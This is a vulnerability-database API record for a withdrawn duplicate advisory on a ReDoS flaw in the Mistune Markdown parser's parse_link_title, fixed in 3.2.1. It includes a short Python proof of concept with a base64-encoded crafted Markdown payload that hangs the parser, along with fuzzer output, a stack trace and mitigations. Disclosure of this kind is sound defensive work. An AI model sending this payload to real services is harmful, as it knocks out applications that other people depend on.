Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/347223?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/347223?format=api", "vulnerability_id": "VCID-sh4a-8vh7-ayb4", "summary": "Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references.\n\n### Original Description\n\n### Summary\n**Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.\n\n**Function affected:** parse_link_title() in helpers.py\n**Issue:** Malformed reference links cause excessive backtracking and parsing loops.\n**Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.\n\n### Details\n```\nName: mistune\nVersion: 3.2.0\nPython version: Python 3.13.9\nPIP version: pip 25.2\nOS: Kali-linux-VERSION=\"2025.4\"\n```\n\n### PoC\n```\nimport mistune\nimport base64\n\nprint(\"Exploit started....!\")\ndata = base64.b64decode(\n \"WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg==\"\n)\nmistune.html(data.decode(\"utf-8\", errors=\"ignore\"))\n```\n\n### Reproduce steps:\nSimply execute above python script it will hang & increase cpu utilization to 100%\n\n**Fuzzer Output (libFuzzer):**\n```\nERROR: libFuzzer: timeout after 3 seconds\nSUMMARY: libFuzzer: timeout\n```\n\n**Stack Trace (Excerpt):**\n```\nmistune/helpers.py:170 in parse_link_title\nmistune/block_parser.py:259 in parse_ref_link\nmistune/core.py:216 in parse_method\nmistune/block_parser.py:458 in parse\nmistune/markdown.py:93 in parse\nmistune/markdown.py:120 in __call__\n```\n### IMAGE POC:\n<img width=\"1194\" height=\"728\" alt=\"POC\" src=\"https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077\" />\n\n\n### Impact:\nDenial-of-Service (DoS)\nHigh CPU usage and application hang\nPotential for service unavailability in web apps or APIs processing untrusted Markdown\n\n### Suggested Mitigations:\nImplement parsing depth and iteration limits.\nLimit reference-link title length.\nDetects excessive escape character sequences.\nAdd defensive checks in parse_link_title.\nAdd fuzz regression tests using the provided PoC.\n\nThis vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.", "aliases": [ { "alias": "GHSA-hjph-f4mc-wx4c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/49669?format=api", "purl": "pkg:pypi/mistune@3.2.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.1" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/49652?format=api", "purl": "pkg:pypi/mistune@3.0.0a1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-dtjf-n7mt-z3ba" }, { "vulnerability": "VCID-q9br-dckr-gkd1" }, { "vulnerability": "VCID-sh4a-8vh7-ayb4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.0.0a1" }, { "url": "http://public2.vulnerablecode.io/api/packages/49668?format=api", "purl": "pkg:pypi/mistune@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8tt4-rc9y-9qgc" }, { "vulnerability": "VCID-atg4-cdz2-cfhe" }, { "vulnerability": "VCID-dtjf-n7mt-z3ba" }, { "vulnerability": "VCID-j8pk-v8t3-ybbu" }, { "vulnerability": "VCID-jpzc-rd9c-vufu" }, { "vulnerability": "VCID-q9br-dckr-gkd1" }, { "vulnerability": "VCID-sh4a-8vh7-ayb4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.0" } ], "references": [ { "reference_url": "https://github.com/lepture/mistune", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/lepture/mistune" }, { "reference_url": "https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c" }, { "reference_url": "https://github.com/advisories/GHSA-hjph-f4mc-wx4c", "reference_id": "GHSA-hjph-f4mc-wx4c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hjph-f4mc-wx4c" } ], "weaknesses": [ { "cwe_id": 400, "name": "Uncontrolled Resource Consumption", "description": "The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources." } ], "exploits": [], "severity_range_score": "7.0 - 8.9", "exploitability": null, "weighted_severity": null, "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sh4a-8vh7-ayb4" }